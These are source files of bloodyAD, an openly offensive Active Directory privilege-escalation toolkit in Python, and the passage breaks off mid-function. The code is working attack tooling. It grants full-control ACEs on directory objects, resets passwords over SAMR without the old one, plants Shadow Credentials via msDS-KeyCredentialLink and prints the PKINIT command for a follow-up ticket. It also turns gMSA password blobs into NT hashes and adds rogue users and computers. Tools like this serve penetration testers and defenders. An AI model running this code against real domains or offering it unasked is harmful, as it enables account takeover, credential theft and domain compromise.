    client_sealing_key = hashlib.new('MD5', self.exported_session_key + b'session key to client-to-server sealing key magic constant\x00').digest()
    server_sealing_key = hashlib.new('MD5', self.exported_session_key + b'session key to server-to-client sealing key magic constant\x00').digest()
    self.client_handle = ARC4.new(client_sealing_key)
    self.server_handle = ARC4.new(server_sealing_key)
setattr(NtlmClient, '_sealkey', _sealkey)

def _signkey(self):
    self.client_signing_key = hashlib.new('MD5', self.exported_session_key + b'session key to client-to-server signing key magic constant\x00').digest()
    self.server_signing_key = hashlib.new('MD5', self.exported_session_key + b'session key to server-to-client signing key magic constant\x00').digest()
setattr(NtlmClient, '_signkey', _signkey)

def sign(self, message, seqnum, side=CLIENT):
    signing_key = None
    if side == CLIENT:
        signing_key = self.client_signing_key
    else:
        signing_key = self.server_signing_key
    version = pack("<I", 1)
    checksum = hmac.new(signing_key, seqnum + message, digestmod=hashlib.md5).digest()[:8]
    return version + checksum + seqnum
setattr(NtlmClient, 'sign', sign)

def seal(self, message):
    payload = self.sign(message, pack("<I", self.sequence_number)) + self.client_handle.encrypt(message)
    self.sequence_number += 1
    return payload
setattr(NtlmClient, 'seal', seal)

def unseal(self, sealed_message):
    message = self.server_handle.decrypt(sealed_message[16:])
    calculated_signature = self.sign(message, sealed_message[12:16], SERVER)
    if calculated_signature != sealed_message[:16]:
        raise LDAPSignatureVerificationFailedError("Signature verification failed for the received LDAP message number " + str(self.sequence_number) + ". Expected signature " + sealed_message[:16].hex() + " but got " + calculated_signature.hex() + ".")
    return message
setattr(NtlmClient, 'unseal', unseal)



import random
import string
import ldap3
import impacket
import logging
import json
from ldap3.protocol.formatters.formatters import format_sid
from impacket.ldap import ldaptypes
from impacket.dcerpc.v5 import samr, dtypes
from dsinternals.system.Guid import Guid
from dsinternals.common.cryptography.X509Certificate2 import X509Certificate2
from dsinternals.system.DateTime import DateTime
from dsinternals.common.data.hello.KeyCredential import KeyCredential
from dsinternals.common.data import DNWithBinary

from bloodyAD.exceptions import NoResultError, ResultError, TooManyResultsError
from bloodyAD.formatters import ACCESS_FLAGS, ACE_FLAGS

LOG = logging.getLogger()
logging.basicConfig(level=logging.DEBUG, format='%(message)s')


# 983551 Full control
def createACE(sid, object_type=None, access_mask=983551):
    nace = ldaptypes.ACE()
    nace['AceFlags'] = ACE_FLAGS['CONTAINER_INHERIT_ACE'] + ACE_FLAGS['OBJECT_INHERIT_ACE']

    if object_type is None:
        acedata = ldaptypes.ACCESS_ALLOWED_ACE()
        nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
    else:   
        nace['AceType'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_TYPE
        acedata = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE()
        acedata['ObjectType'] = impacket.uuid.string_to_bin(object_type)
        acedata['InheritedObjectType'] = b''
        acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT

    acedata['Mask'] = ldaptypes.ACCESS_MASK()
    acedata['Mask']['Mask'] = access_mask

    if type(sid) is str:
        acedata['Sid'] = ldaptypes.LDAP_SID()
        acedata['Sid'].fromCanonical(sid)
    else:
        acedata['Sid'] = sid

    nace['Ace'] = acedata
    return nace


def createEmptySD():
    sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
    sd['Revision'] = b'\x01'
    sd['Sbz1'] = b'\x00'
    sd['Control'] = 32772
    sd['OwnerSid'] = ldaptypes.LDAP_SID()
    # BUILTIN\Administrators
    sd['OwnerSid'].fromCanonical('S-1-5-32-544')
    sd['GroupSid'] = b''
    sd['Sacl'] = b''
    acl = ldaptypes.ACL()
    acl['AclRevision'] = 4
    acl['Sbz1'] = 0
    acl['Sbz2'] = 0
    acl.aces = []
    sd['Dacl'] = acl
    return sd


def resolvDN(conn, identity, objtype=None):
    """
    Return the DN for the object based on the parameters identity
    Args:
        identity: sAMAccountName, DN, GUID or SID of the user
        objtype: None is default or GPO
    """

    if "dc=" in identity.lower():
        # identity is a DN, return as is
        # We do not try to validate it because it could be from another trusted domain
        return identity

    if "s-1-" in identity.lower():
        # We assume identity is an SID
        ldap_filter = f'(objectSid={identity})'

    elif "{" in identity:
        if objtype == "GPO":
            ldap_filter = f'(&(objectClass=groupPolicyContainer)(name={identity}))'
        else:        
            # We assume identity is a GUID
            ldap_filter = f'(objectGUID={identity})'
    else:
        # By default, we assume identity is a sam account name
        ldap_filter = f'(sAMAccountName={identity})'

    naming_context = getDefaultNamingContext(conn)
    conn.search(naming_context, ldap_filter)

    entries = [e for e in conn.response if e.get('type', '') == 'searchResEntry']

    if len(entries) < 1:
        raise NoResultError(naming_context, ldap_filter)

    if len(entries) > 1:
        raise TooManyResultsError(naming_context, ldap_filter, entries)

    res = entries[0]['dn']
    return res

def getObjAttr(conn, identity, attr='*', fetchSD="False", isLog=False):
    """
    Fetch LDAP attributes for the identity (group or user) provided
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
        attr: attributes to fetch separated with ',' (default fetch all attributes)
        fetchSD: True fetch nTSecurityDescriptor that contains DACL (default is False)
    """
    ldap_conn = conn.getLdapConnection()
    dn = resolvDN(ldap_conn, identity)
    control_flag = 0
    if fetchSD == "True":
        # If SACL is asked the server will not return the nTSecurityDescriptor for a standard user because it needs privileges
        control_flag = dtypes.OWNER_SECURITY_INFORMATION + dtypes.GROUP_SECURITY_INFORMATION + dtypes.DACL_SECURITY_INFORMATION
    controls = ldap3.protocol.microsoft.security_descriptor_control(sdflags=control_flag)
    ldap_conn.search(dn, "(objectClass=*)", search_scope=ldap3.BASE, attributes=attr.split(','), controls=controls)
    if isLog:
        print(json.dumps(json.loads(conn.getLdapConnection().response_to_json())['entries'][0]['attributes'], indent=4, sort_keys=True))
    return ldap_conn.response[0]

def setAttr(conn, identity, attribute, value):
    """
    Add or replace an attribute of an object
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object
        attribute: Name of the attribute 
        value: jSON array (e.g ["john.doe"])
    """
    ldap_conn = conn.getLdapConnection()
    dn = resolvDN(ldap_conn, identity)
    ldap_conn.modify(dn, {attribute: [ldap3.MODIFY_REPLACE, value]})

    if ldap_conn.result['result'] == 0:
        LOG.debug(f"[+] {attribute} set successfully")
    else:
        raise ResultError(conn.result)


def getDefaultNamingContext(conn):
    naming_context = conn.server.info.other['defaultNamingContext'][0]
    return naming_context


def getObjectSID(conn, identity):
    """
    Get the SID for the given identity
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object
    """
    ldap_conn = conn.getLdapConnection()
    object_dn = resolvDN(ldap_conn, identity)
    ldap_conn.search(object_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes='objectSid')
    object_sid = ldap_conn.response[0]['raw_attributes']['objectSid'][0]
    LOG.debug(f'[*] {identity} SID is: {format_sid(object_sid)}')
    return object_sid


def cryptPassword(session_key, password):
    try:
        from Cryptodome.Cipher import ARC4
    except Exception:
        LOG.error("Warning: You don't have any crypto installed. You need pycryptodomex")
        LOG.error("See https://pypi.org/project/pycryptodomex/")

    sam_user_pass = samr.SAMPR_USER_PASSWORD()
    encoded_pass = password.encode('utf-16le')
    plen = len(encoded_pass)
    sam_user_pass['Buffer'] = b'A' * (512 - plen) + encoded_pass
    sam_user_pass['Length'] = plen
    pwdBuff = sam_user_pass.getData()

    rc4 = ARC4.new(session_key)
    encBuf = rc4.encrypt(pwdBuff)

    sam_user_pass_enc = samr.SAMPR_ENCRYPTED_USER_PASSWORD()
    sam_user_pass_enc['Buffer'] = encBuf
    return sam_user_pass_enc


def rpcChangePassword(conn, target, new_pass):
    """
    Change the target password without knowing the old one using RPC instead of LDAPS
    Args:
        domain for NTLM authentication
        NTLM username of the user with permissions on the target
        NTLM password or hash of the user
        IP or hostname of the DC to make the password change
        sAMAccountName of the target
        new password for the target
    """
    dce = conn.getSamrConnection()
    server_handle = samr.hSamrConnect(dce, conn.conf.host + '\x00')['ServerHandle']
    domainSID = samr.hSamrLookupDomainInSamServer(dce, server_handle, conn.conf.domain)['DomainId']
    domain_handle = samr.hSamrOpenDomain(dce, server_handle, domainId=domainSID)['DomainHandle']
    userRID = samr.hSamrLookupNamesInDomain(dce, domain_handle, (target,))['RelativeIds']['Element'][0]
    opened_user = samr.hSamrOpenUser(dce, domain_handle, userId=userRID)

    req = samr.SamrSetInformationUser2()
    req['UserHandle'] = opened_user['UserHandle']
    req['UserInformationClass'] = samr.USER_INFORMATION_CLASS.UserInternal5Information
    req['Buffer'] = samr.SAMPR_USER_INFO_BUFFER()
    req['Buffer']['tag'] = samr.USER_INFORMATION_CLASS.UserInternal5Information
    req['Buffer']['Internal5']['UserPassword'] = cryptPassword(b'SystemLibraryDTC', new_pass)
    req['Buffer']['Internal5']['PasswordExpired'] = 0

    resp = dce.request(req)
    return resp

def modifySecDesc(conn, identity, target,
    ldap_filter='(objectClass=*)', ldap_attribute='nTSecurityDescriptor',
    object_type=None, access_mask=ACCESS_FLAGS['GENERIC_ALL'], control_flag=None, enable="True"):

    enable = enable == "True"
    ldap_conn = conn.getLdapConnection()

    target_dn = resolvDN(ldap_conn, target)
    controls=None
    if control_flag:
        controls = ldap3.protocol.microsoft.security_descriptor_control(sdflags=control_flag)
    ldap_conn.search(target_dn, ldap_filter, search_scope=ldap3.BASE, attributes=ldap_attribute, controls=controls)

    if len(ldap_conn.entries) < 1:
        raise NoResultError(target_dn, ldap_filter)

    entry_dn = ldap_conn.entries[0].entry_dn

    sd_data = ldap_conn.entries[0][ldap_attribute].raw_values
    if len(sd_data) < 1:
        sd = createEmptySD()
    else:
        sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data[0])

    old_sd = sd
    user_sid = getObjectSID(conn, identity)
    attr_values = []

    if control_flag == dtypes.OWNER_SECURITY_INFORMATION:
        sd['OwnerSid'] = ldaptypes.LDAP_SID()
        sd['OwnerSid'].fromCanonical(format_sid(user_sid))
        attr_values.append(sd.getData())
    else:
        if enable:
            sd['Dacl'].aces.append(createACE(sid=user_sid, access_mask=access_mask))
        else:
            aces_to_keep = []
            LOG.debug('Currently allowed sids:')
            for ace in sd['Dacl'].aces:
                ace_sid = ace['Ace']['Sid']
                if ace_sid.getData() == user_sid:
                    LOG.debug('    %s (will be removed)' % ace_sid.formatCanonical())
                    sd['Dacl'].aces.remove(ace)
                else:
                    LOG.debug('    %s' % ace_sid.formatCanonical())

        # Remove the attribute if there is no ace to keep
        if len(sd['Dacl'].aces) > 0 or ldap_attribute == 'nTSecurityDescriptor':
            attr_values.append(sd.getData())

    ldap_conn.modify(entry_dn, {ldap_attribute: [ldap3.MODIFY_REPLACE, attr_values]}, controls=controls)
    if ldap_conn.result['result'] == 0:
        return old_sd
    else:
        raise ResultError(ldap_conn.result)

def addShadowCredentials(conn, identity, outfilePath=None):
    """
    Allow to authenticate as the user provided using a crafted certificate (Shadow Credentials)
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
        outfilePath: file path for the generated certificate (default is current path)
    """
    ldap_conn = conn.getLdapConnection()
    target_dn = resolvDN(ldap_conn, identity)

    LOG.debug("Generating certificate")
    certificate = X509Certificate2(subject=identity, keySize=2048, notBefore=(-40 * 365), notAfter=(40 * 365))
    LOG.debug("Certificate generated")
    LOG.debug("Generating KeyCredential")
    keyCredential = KeyCredential.fromX509Certificate2(certificate=certificate, deviceId=Guid(), owner=target_dn, currentTime=DateTime())
    LOG.debug("KeyCredential generated with DeviceID: %s" % keyCredential.DeviceId.toFormatD())
    LOG.debug("KeyCredential: %s" % keyCredential.toDNWithBinary().toString())

    ldap_conn.search(target_dn, '(objectClass=*)', search_scope=ldap3.BASE, attributes=['msDS-KeyCredentialLink'])

    new_values = ldap_conn.response[0]['raw_attributes']['msDS-KeyCredentialLink'] + [keyCredential.toDNWithBinary().toString()]
    LOG.debug("Updating the msDS-KeyCredentialLink attribute of %s" % identity)
    ldap_conn.modify(target_dn, {'msDS-KeyCredentialLink': [ldap3.MODIFY_REPLACE, new_values]})
    
    if ldap_conn.result['result'] == 0:
        LOG.debug("msDS-KeyCredentialLink attribute of the target object updated")
        if outfilePath is None:
            path = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8))
            LOG.info("No outfile path was provided. The certificate(s) will be stored with the filename: %s" % path)
        else:
            path = outfilePath

        certificate.ExportPEM(path_to_files=path)
        LOG.info("Saved PEM certificate at path: %s" % path + "_cert.pem")
        LOG.info("Saved PEM private key at path: %s" % path + "_priv.pem")
        LOG.info("A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools")
        LOG.info("Run the following command to obtain a TGT:")
        LOG.info("python3 PKINITtools/gettgtpkinit.py -cert-pem %s_cert.pem -key-pem %s_priv.pem %s/%s %s.ccache" % (path, path, conn.conf.domain, identity, path))

    else:
        raise ResultError(ldap_conn.result)


def delShadowCredentials(conn, identity, deviceID):
    """
    Delete the crafted certificate (Shadow Credentials) from the msDS-KeyCredentialLink attribute of the user provided
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target (You must have write permission on it)
    """
    attr = 'msDS-KeyCredentialLink'
    keyCreds = getObjAttr(conn, identity, attr)['raw_attributes'][attr]
    newKeyCreds = []
    for keyCred in keyCreds:    
        dnBin = DNWithBinary.DNWithBinary.fromRawDNWithBinary(keyCred)
        if deviceID and KeyCredential.fromDNWithBinary(dnBin).DeviceId.toFormatD() != deviceID:
            newKeyCreds.append(keyCred)
        else:
            LOG.debug("[*] Key to delete found")

    setAttr(conn, identity, attr, newKeyCreds)


#!/usr/bin/env python3
import sys
import argparse
from bloodyAD import functions, ConnectionHandler


def main():
    parser = argparse.ArgumentParser(description='AD Privesc Swiss Army Knife', formatter_class=argparse.RawTextHelpFormatter)

    parser._optionals.title = 'Main options'
    parser._positionals.title = 'Required options'

    parser.add_argument('-d', '--domain', help='Domain used for NTLM authentication')
    parser.add_argument('-u', '--username', help='Username used for NTLM authentication')
    parser.add_argument('-p', '--password', help='Cleartext password or LMHASH:NTHASH for NTLM authentication')
    parser.add_argument('-k', '--kerberos', action='store_true', default=False)
    parser.add_argument('-c', '--certificate', help='Certificate authentication, e.g: "path/to/key:path/to/cert"')
    parser.add_argument('-s', '--secure', help='Try to use LDAP over TLS aka LDAPS (default is LDAP)', action='store_true', default=False)
    parser.add_argument('--host', help='Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)')

    # Find list of functions and their arguments in ldap.py
    # And add them all as subparsers
    subparsers = parser.add_subparsers(title="Commands", help='Function to call')
    for name, f in functions:
        subparser = subparsers.add_parser(name, prog=f.__doc__)
        subparser.add_argument('func_args', nargs='*')
        subparser.set_defaults(func=f)

    args = parser.parse_args()

    if not 'func' in args :
        parser.print_help(sys.stderr)
        sys.exit(1)
        
    # Get the list of parameters to provide to the command
    param_names = args.func.__code__.co_varnames[1:args.func.__code__.co_argcount]
    param_values = args.func_args

    if len(param_values) > len(param_names):
        print("You provided too many arguments\n")
        print(args.func.__name__ + ':')
        print(args.func.__doc__)
        sys.exit(1)

    params = {param_names[i]: param_values[i] for i in range(len(param_values))}

    # Launch the command
    conn = ConnectionHandler(args=args)
    args.func(conn, **params)


if __name__ == '__main__':
    main()




import base64, binascii, uuid
from impacket.ldap import ldaptypes
from impacket.structure import Structure
from Cryptodome.Hash import MD4

ldap_conn = None


# https://docs.microsoft.com/en-us/windows/win32/secauthz/access-rights-and-access-masks
ACCESS_FLAGS = {
    # Flag constants
    'GENERIC_READ' : 0x80000000,
    'GENERIC_WRITE' : 0x40000000,
    'GENERIC_EXECUTE' : 0x20000000,
    'GENERIC_ALL' : 0x10000000,
    'MAXIMUM_ALLOWED' : 0x02000000,
    'ACCESS_SYSTEM_SECURITY' : 0x01000000,
    'SYNCHRONIZE' : 0x00100000,
    'WRITE_OWNER' : 0x00080000,
    'WRITE_DACL' : 0x00040000,
    'READ_CONTROL' : 0x00020000,
    'DELETE' : 0x00010000,
    # ACE type specific mask constants
    # Note that while not documented, these also seem valid
    # for ACCESS_ALLOWED_ACE types
    'ADS_RIGHT_DS_CONTROL_ACCESS' : 0x00000100,
    'ADS_RIGHT_DS_CREATE_CHILD' : 0x00000001,
    'ADS_RIGHT_DS_DELETE_CHILD' : 0x00000002,
    'ADS_RIGHT_DS_READ_PROP' : 0x00000010,
    'ADS_RIGHT_DS_WRITE_PROP' : 0x00000020,
    'ADS_RIGHT_DS_SELF' : 0x00000008
}

# https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace
ACE_FLAGS = {
    # Flag constants
    'CONTAINER_INHERIT_ACE' : 0x02,
    'FAILED_ACCESS_ACE_FLAG' : 0x80,
    'INHERIT_ONLY_ACE' : 0x08,
    'INHERITED_ACE' : 0x10,
    'NO_PROPAGATE_INHERIT_ACE' : 0x04,
    'OBJECT_INHERIT_ACE' : 0x01,
    'SUCCESSFUL_ACCESS_ACE_FLAG' : 0x40
}

# see https://social.technet.microsoft.com/wiki/contents/articles/37395.active-directory-schema-versions.aspx
SCHEMA_VERSION = {
    '13' : 'Windows 2000 Server',
    '30' : 'Windows Server 2003',
    '31' : 'Windows Server 2003 R2',
    '44' : 'Windows Server 2008',
    '47' : 'Windows Server 2008 R2',
    '56' : 'Windows Server 2012',
    '69' : 'Windows Server 2012 R2',
    '87' : 'Windows Server 2016',
    '88' : 'Windows Server 2019/2022'
}

# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/d7422d35-448a-451a-8846-6a7def0044df?redirectedfrom=MSDN
FUNCTIONAL_LEVEL = {
    '0' : 'DS_BEHAVIOR_WIN2000',
    '1' : 'DS_BEHAVIOR_WIN2003_WITH_MIXED_DOMAINS',
    '2' : 'DS_BEHAVIOR_WIN2003',
    '3' : 'DS_BEHAVIOR_WIN2008',
    '4' : 'DS_BEHAVIOR_WIN2008R2',
    '5' : 'DS_BEHAVIOR_WIN2012',
    '6' : 'DS_BEHAVIOR_WIN2012R2',
    '7' : 'DS_BEHAVIOR_WIN2016'
}

# see https://docs.microsoft.com/fr-fr/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
ACCOUNT_FLAGS = {
    'SCRIPT' : 0x0001,
    'ACCOUNTDISABLE' : 0x0002,
    'HOMEDIR_REQUIRED' : 0x0008,
    'LOCKOUT' : 0x0010,
    'PASSWD_NOTREQD' : 0x0020,
    'PASSWD_CANT_CHANGE' : 0x0040,
    'ENCRYPTED_TEXT_PWD_ALLOWED' : 0x0080,
    'TEMP_DUPLICATE_ACCOUNT' : 0x0100,
    'NORMAL_ACCOUNT' : 0x0200,
    'INTERDOMAIN_TRUST_ACCOUNT' : 0x0800,
    'WORKSTATION_TRUST_ACCOUNT' : 0x1000,
    'SERVER_TRUST_ACCOUNT' : 0x2000,
    'DONT_EXPIRE_PASSWORD' : 0x10000,
    'MNS_LOGON_ACCOUNT' : 0x20000,
    'SMARTCARD_REQUIRED' : 0x40000,
    'TRUSTED_FOR_DELEGATION' : 0x80000,
    'NOT_DELEGATED' : 0x100000,
    'USE_DES_KEY_ONLY' : 0x200000,
    'DONT_REQ_PREAUTH' : 0x400000,
    'PASSWORD_EXPIRED' : 0x800000,
    'TRUSTED_TO_AUTH_FOR_DELEGATION' : 0x1000000,
    'PARTIAL_SECRETS_ACCOUNT' : 0x04000000
}

def decodeAccessMask(mask):
    pretty_mask = [key for key,val in ACCESS_FLAGS.items() if mask.hasPriv(val)]
    return pretty_mask if len(pretty_mask) > 0 else mask['Mask']


def decodeAceFlags(ace):
    pretty_flags = [key for key,val in ACE_FLAGS.items() if ace.hasFlag(val)]
    return pretty_flags if len(pretty_flags) > 0 else ace['AceFlags']


def ldap_search(base_dn, filter, attr):
    if not ldap_conn.search(base_dn, filter, attributes=attr) or not len(ldap_conn.entries) or attr not in ldap_conn.entries[0]:
        return None
    return ldap_conn.entries[0][attr].value

def resolveSid(sid):
    root_dn = ldap_conn.server.info.other['defaultNamingContext'][0]
    r = ldap_search(f"CN=WellKnown Security Principals,CN=Configuration,{root_dn}", f"(objectSid={sid})",'name')
    if r:
        return r
    r = ldap_search(root_dn, f"(objectSid={sid})",'sAMAccountName')
    return r if r else sid


def resolveGUID(guid_raw):
    attr = 'name'
    guid_canonical = str(uuid.UUID(bytes_le=guid_raw))
    guid_str = '\\'+'\\'.join(['{:02x}'.format(b) for b in guid_raw])
    schema_dn = ldap_conn.server.info.other['schemaNamingContext'][0]
    r = ldap_search(f"CN=Extended-Rights,{ldap_conn.server.info.other['configurationNamingContext'][0]}", f"(rightsGuid={guid_canonical})", attr)
    if not r:
        r = ldap_search(schema_dn, f"(schemaIDGUID={guid_str})", attr)
        return r if r else guid_canonical
    if not ldap_conn.search(schema_dn,f"(attributeSecurityGUID={guid_str})",attributes=attr) or not len(ldap_conn.entries):
        return r
    return {r:[entry[attr].value for entry in ldap_conn.entries]}


def formatSD(sd_bytes):
        sd=ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_bytes)
        pretty_sd = {}
        if sd['OffsetOwner'] != 0:           
            pretty_sd['Owner'] = resolveSid(sd['OwnerSid'].formatCanonical())
        if sd['OffsetGroup'] != 0:
            pretty_sd['Group'] = resolveSid(sd['GroupSid'].formatCanonical())
        if sd['OffsetSacl'] != 0:
            pretty_sd['Sacl'] = base64.b64encode(sd['Sacl'].getData())
        if sd['OffsetDacl'] != 0:
            pretty_aces = []
            for ace in sd['Dacl'].aces:
                ace_val = ace['Ace']
                pretty_ace = {
                    'TypeName':ace['TypeName'], 
                    'Trustee': resolveSid(ace_val['Sid'].formatCanonical()),
                    'Mask':decodeAccessMask(ace_val['Mask'])
                }
                if ace['AceFlags'] > 0:
                    pretty_ace['Flags'] = decodeAceFlags(ace)
                if 'InheritedObjectType' in ace_val.__dict__['fields'] and len(ace_val['InheritedObjectType']) != 0:
                    pretty_ace['InheritedObjectType'] = resolveGUID(ace_val['InheritedObjectType'])
                if 'ObjectType' in ace_val.__dict__['fields'] and len(ace_val['ObjectType']) != 0:
                    pretty_ace['ObjectType'] = resolveGUID(ace_val['ObjectType'])
                pretty_aces.append(pretty_ace)
            pretty_sd['Dacl'] = pretty_aces
        return pretty_sd


def formatFunctionalLevel(behavior_version):
    behavior_version = behavior_version.decode()
    return FUNCTIONAL_LEVEL[behavior_version] if behavior_version in FUNCTIONAL_LEVEL else behavior_version


def formatSchemaVersion(objectVersion):
    objectVersion = objectVersion.decode()
    return SCHEMA_VERSION[objectVersion] if objectVersion in SCHEMA_VERSION else objectVersion


def formatAccountControl(userAccountControl):
    userAccountControl = int(userAccountControl.decode())
    return [key for key,val in ACCOUNT_FLAGS.items() if userAccountControl & val == val]


class MSDS_MANAGEDPASSWORD_BLOB(Structure):
    structure = (
        ('Version','<H'),
        ('Reserved','<H'),
        ('Length','<L'),
        ('CurrentPasswordOffset','<H'),
        ('PreviousPasswordOffset','<H'),
        ('QueryPasswordIntervalOffset','<H'),
        ('UnchangedPasswordIntervalOffset','<H'),
        ('CurrentPassword',':'),
        ('PreviousPassword',':'),
        #('AlignmentPadding',':'),
        ('QueryPasswordInterval',':'),
        ('UnchangedPasswordInterval',':'),
    )

    def __init__(self, data = None):
        Structure.__init__(self, data = data)

    def fromString(self, data):
        Structure.fromString(self,data)

        if self['PreviousPasswordOffset'] == 0:
            endData = self['QueryPasswordIntervalOffset']
        else:
            endData = self['PreviousPasswordOffset']

        self['CurrentPassword'] = self.rawData[self['CurrentPasswordOffset']:][:endData - self['CurrentPasswordOffset']]
        if self['PreviousPasswordOffset'] != 0:
            self['PreviousPassword'] = self.rawData[self['PreviousPasswordOffset']:][:self['QueryPasswordIntervalOffset']-self['PreviousPasswordOffset']]

        self['QueryPasswordInterval'] = self.rawData[self['QueryPasswordIntervalOffset']:][:self['UnchangedPasswordIntervalOffset']-self['QueryPasswordIntervalOffset']]
        self['UnchangedPasswordInterval'] = self.rawData[self['UnchangedPasswordIntervalOffset']:]


def formatGMSApass(managedPassword):
    blob = MSDS_MANAGEDPASSWORD_BLOB(managedPassword)
    hash = MD4.new()
    hash.update(blob['CurrentPassword'][:-2])
    passwd = "aad3b435b51404eeaad3b435b51404ee:" + binascii.hexlify(hash.digest()).decode()
    return passwd

    
    




from setuptools import setup

setup(name='bloodyAD',
      version='0.1',
      description='AD Privesc Swiss Army Knife',
      author='CravateRouge',
      author_email='baptiste.crepin@ntymail.com',
      url='https://github.com/CravateRouge/bloodyAD',
      download_url='https://github.com/CravateRouge/bloodyAD/archive/refs/tags/v0.1.tar.gz',
      packages=['bloodyAD'],
      license='MIT',
      install_requires=['dsinternals>=1.2.4','impacket>=0.10.0','ldap3>=2.9; python_version >= "3.6"'],
      keywords = ['Active Directory', 'Privilege Escalation'],
      classifiers=[
        'Intended Audience :: Information Technology',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Programming Language :: Python :: 3.10'
      ],
      python_requires='>=3.6'
      )


import ldap3
import types
import re
import json
from functools import wraps

from ldap3.extend.microsoft import addMembersToGroups, modifyPassword, removeMembersFromGroups
from impacket.dcerpc.v5 import dtypes

from bloodyAD.exceptions import BloodyError, ResultError, NoResultError
from bloodyAD.utils import resolvDN, getDefaultNamingContext, getObjAttr, setAttr
from bloodyAD.utils import rpcChangePassword
from bloodyAD.utils import modifySecDesc
from bloodyAD.utils import addShadowCredentials, delShadowCredentials
from bloodyAD.utils import LOG
from bloodyAD.formatters import ACCESS_FLAGS


functions = []


def register_module(f):
    functions.append((f.__name__, f))

    @wraps(f)
    def wrapper(*args, **kwds):
        return f(*args, **kwds)

    return wrapper


@register_module
def getObjectAttributes(conn, identity, attr='*', fetchSD="False"):
    """
    Fetch LDAP attributes for the identity (group or user) provided
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
        attr: attributes to fetch separated with ',' (default fetch all attributes)
        fetchSD: True fetch nTSecurityDescriptor that contains DACL (default is False)
    """
    getObjAttr(conn, identity, attr, fetchSD, True)


@register_module
def setAttribute(conn, identity, attribute, value):
    """
    Add or replace an attribute of an object
    Args:
        identity: sAMAccountName, DN, GUID or SID of the object
        attribute: Name of the attribute 
        value: jSON array (e.g ["john.doe"])
    """
    value = json.loads(value)
    setAttr(conn, identity, attribute, value)


@register_module
def addUser(conn, sAMAccountName, password, ou=None):
    """
    Add a new user in the LDAP database
    By default the user object is put in the OU Users
    This can be changed with the ou parameter
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
        password: the password that will be set for the user account
    """
    ldap_conn = conn.getLdapConnection()

    if ou:
        user_dn = f"cn={sAMAccountName},{ou}"
    else:
        naming_context = getDefaultNamingContext(ldap_conn)
        user_dn = f"cn={sAMAccountName},cn=Users,{naming_context}"

    attr = {
    'objectClass': ['top', 'person', 'organizationalPerson', 'user'],
    'distinguishedName' : user_dn,
    'sAMAccountName' : sAMAccountName,
    'userAccountControl' : 544,
    'unicodePwd': ('"%s"' % password).encode('utf-16-le')
    }

    ldap_conn.add(user_dn, attributes=attr)

    if ldap_conn.result['description'] == 'success':
        LOG.info(f"[+] {sAMAccountName} has been successfully added")
    else:
        LOG.error(sAMAccountName + ': ' + ldap_conn.result['description'])
        raise BloodyError(ldap_conn.result['description'])


@register_module
def addComputer(conn, hostname, password, ou=None):
    """
    Add a new computer in the AD database
    By default the computer object is put in the OU CN=Computers
    This can be changed with the ou parameter
    Args:
        hostname: computer name (without the trailing $ symbol)
        password: the password that will be set for the computer account
        ou: Optional parameters - Where to put the computer object in the LDAP directory
    """
    cnf = conn.conf
    ldap_conn = conn.getLdapConnection()

    if ou:
        computer_dn = f"cn={hostname},{ou}"
    else:
        naming_context = getDefaultNamingContext(ldap_conn)
        computer_dn = f"cn={hostname},cn=Computers,{naming_context}"

    # Default computer SPNs
    spns = [
        'HOST/%s' % hostname,
        'HOST/%s.%s' % (hostname, cnf.domain),
        'RestrictedKrbHost/%s' % hostname,
        'RestrictedKrbHost/%s.%s' % (hostname, cnf.domain),
    ]
    attr = {
        'objectClass' : ['top','person','organizationalPerson','user','computer'],
        'dnsHostName': '%s.%s' % (hostname, cnf.domain),
        'userAccountControl': 0x1000,
        'servicePrincipalName': spns,
        'sAMAccountName': f"{hostname}$",
        'unicodePwd': ('"%s"' % password).encode('utf-16-le')
    }

    ldap_conn.add(computer_dn, attributes=attr)
    
    if ldap_conn.result['description'] == 'success':
        LOG.info(f"[+] {hostname} has been successfully added")
    else:
        LOG.error(hostname + ': ' + ldap_conn.result['description'])
        raise BloodyError(ldap_conn.result['description'])

    # if re.search('[a-zA-Z]', cnf.host):
    #     dc_host = cnf.host
    #     dc_ip = None
    # else:
    #     dc_host = None
    #     dc_ip = cnf.host
    # options = types.SimpleNamespace(
    #     hashes=f'{cnf.lmhash}:{cnf.nthash}' if cnf.nthash else None,
    #     aesKey=None, k=cnf.kerberos, kdc_host=None,
    #     dc_host=dc_host, dc_ip=dc_ip,
    #     computer_name=hostname, computer_pass=password,
    #     method='LDAPS' if cnf.scheme.lower() == 'ldaps' else 'SAMR',
    #     port=None, domain_netbios=None,
    #     no_add=None, delete=None, baseDN=None,
    #     computer_group=ou)
    # ADDCOMPUTER(cnf.username, cnf.password, cnf.domain, options).run()

@register_module
def delObject(conn, identity):
    """
    Delete an object (user or group) from the Directory based on the identity provided
    Args:
        identity: sAMAccountName, DN, GUID or SID of the target
    """
    ldap_conn = conn.getLdapConnection()
    dn = resolvDN(ldap_conn, identity)
    LOG.debug(f"[*] Trying to remove {dn}")
    ldap_conn.delete(dn)
    LOG.info(f"[-] {dn} has been removed")


@register_module
def changePassword(conn, identity, new_pass):
    """
    Change the target password without knowing the old one using LDAPS or RPC
    Args:
